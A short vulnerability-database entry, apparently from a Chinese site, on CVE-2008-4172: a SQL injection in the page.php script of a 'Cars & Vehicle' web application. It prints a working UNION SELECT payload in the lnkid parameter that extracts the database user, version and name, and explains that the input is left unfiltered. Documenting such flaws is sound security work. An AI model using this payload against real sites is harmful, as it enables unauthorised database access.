Cars & Vehicle -... CVE-2008-4172 CNNVD-200809-286

7.5 AV AC AU C I A
发布: 2008-09-22
修订: 2017-08-08

exp ``` www.example.com/Script/page.php?lnkid=-1/**/UNION/**/SELECT/**/1,1,1,1,concat_ws(user(),version(),database()),1/* ``` 文件page.php没有对linkid的值进行过滤,直接带入了查询,导致sql注入漏洞产生

0%

漏洞利用/PoC

当前有2条漏洞利用/PoC

受影响的平台与产品

当前有1条受影响产品信息